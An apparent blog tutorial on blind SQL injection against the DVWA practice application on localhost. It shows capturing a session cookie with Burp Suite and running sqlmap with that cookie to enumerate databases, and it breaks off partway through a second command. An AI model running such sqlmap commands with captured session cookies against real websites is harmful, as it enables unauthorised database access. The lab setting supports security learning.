WITH BURP SUIT AND SQLMAP This tutorial is for educational purpose only and please dont use it for any unethical purpose and this blog or its author wont be responsible for the after effects you face if you do something unethical For this example Iam testing on DVWA(Damn Vulnerable Web Application),Blind SQL injection Blind SQL Injection ++++++++++++++++++++ -tamper data with burp suit(if you dont know ,there are lot of tutorials) and find cookie security=low; PHPSESSID=q5ceoc6r4kr3t3kpfppma5l4e1 -run sqlmap -copy our weppage url(DVWA) http://localhost/dvwa-master/vulnerabilities/sqli_blind/?id=1 -in sql map type following command sqlmap -u 'http://localhost/dvwa-master/vulnerabilities/sqli_blind/?id=1' --cookie="security=low; PHPSESSID=q5ceoc6r4kr3t3kpfppma5l4e1" --dbs -in my case i must use sqlmap.py since i use windows for this test sqlmap.py -u 'http://localhost/dvwa-master/vulnerabilities/sqli_blind/?id=1' --c